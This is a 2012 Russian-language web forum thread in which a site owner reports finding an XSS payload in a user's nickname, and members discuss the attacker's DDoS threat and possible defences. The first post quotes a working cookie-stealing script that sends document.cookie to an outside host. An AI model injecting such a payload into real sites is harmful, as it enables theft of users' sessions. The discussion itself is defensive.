XSS-атака на сайт, кому знакомо ?

ЕСТЬ РЕШЕНИЕ ЗАКРЫТО
#1 15 августа 2012 в 23:43
в нике юзера вижу такое

<script>img = new Image();img.src="http://antiha.h19.ru/s.gif?"+document.cookie;</script>

это попытка взлома или что?
#2 16 августа 2012 в 00:04
lezginka.ru, конечно попытка взлома!!! А возможно спама и заражения сайта или пользователей!
#3 16 августа 2012 в 00:44
вот что мне написал этот чел:

Ой xxs атака, что на форуме разнылся, я и 2 сайт хлопну, могу их под ддос положить на вечно, сиди тихо я тут властелин,

видать это чел и тут на форуме тусуется.
уважаемый "властелин" ты свое личико тут покажи, если такой смелый, пусть народ знает своих "героев"
#4 16 августа 2012 в 01:19
Группе, к которой вы принадлежите, запрещено просматривать этот скрытый текст

Очень надеюсь, всё же, что 1.9.1, и тем более 2.0 будут без этого.
#5 16 августа 2012 в 01:46

Проверил Acunetix Web Vulnerability Scanner 8, волосы дыбом встали

• Ɍɕβoṙη •
вот интересно посмотреть что там выдал этот сканер?
#6 16 августа 2012 в 01:53
кстати. этот чел мне обещал ддос на завтра.
у кого какие есть предложения по защите ?
он сам стесняется тут писать, хотя эти строки и читает(сейчас хакеры стеснительные пошли)
#7 16 августа 2012 в 02:04

вот интересно посмотреть что там выдал этот сканер?

На рутрекере есть, если не найдете, могу в личку скинуть.
Да что там интересного то… много пожеланий по поводу закрытия от sql иньекций, и не только.

кстати. этот чел мне обещал ддос на завтра.

Мне кажется, не стоит по этому поводу напрягаться, мало, кто может сделать это профессионально.А обычный Hoic4 ////это смешно)
#8 16 августа 2012 в 02:49

у кого какие есть предложения по защите ?

lezginka.ru
iptables для этого нужно использовать, не думаю что ваш сайт понадобился какой то серьезной комманде а один человек маловероятно что сможет серьезную атаку организовать
#9 16 августа 2012 в 02:56
А еси через Тор работает, тогда Iptables поможет?
#10 16 августа 2012 в 03:02
Было так /admin/.htaccess с паролем
  1.  
  2. <Limit GET POST>
  3. require valid-user
  4. </Limit>
  5. AuthType Basic
  6. AuthName "adminka"
  7. AuthUserFile /home/users1/r/ramiz/domains/dagmir.ru/admin/.htpasswd
  8.  
  9.  
и соответственно .htpasswd
  1.  
  2. admin:$apr1$9t0.....$PPfYMjwG590xNIEfhE26V0
  3.  
Вот так...
Пока не удалил, в админку не попал…
#11 16 августа 2012 в 04:16
Решение — пользователя блокировать — сделать приглашение по инвайтам — в случае входа пользователя по приглашению с плохими намерениями — сразу удалять его.

Хостинг — сделать — фильтрацию по IP адресам, так же и админку на самом сайте. И все файлы важные — права 644.

Ну мне по крайней мере пока помогает — проблем со спамерами и взломщиками пока нет. Раньше были такие попытки, в том числе и взлома.

Хотя конечно ломануть могут что угодно — но только профи и командой — по крайней мере начинающие хакеры мозг тра… ть не будут.
#12 16 августа 2012 в 04:25
Hunter (Роман), без обид, но… не решение.
#13 16 августа 2012 в 04:32
Всё, замяли.Акима более не тронут.
#14 16 августа 2012 в 04:52

Hunter (Роман), без обид, но… не решение.

• Ɍɕβoṙη •

Да это понятно — я и не обижаюсь — вообще не спец по защите если что.

А я вообще не понимаю смысл этих взломов — для чего это нужно — да еще так в открытую — ну ладно бы какой-то код встроить по тихой чтоб незаметно было — а так смысл какой.

Всегда ж есть Бэкап — можно все на день, два откатить — через хостинг....

Я понимаю банки ломают, ну или крутые сайты конкурентов пытаются устранить. А так смысл. в чем…
#15 16 августа 2012 в 04:53
по разному бывает...
Хотя, я признаюсь честно, ни какого решения я не увидел, за исключением одного, о котором писать не буду)
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.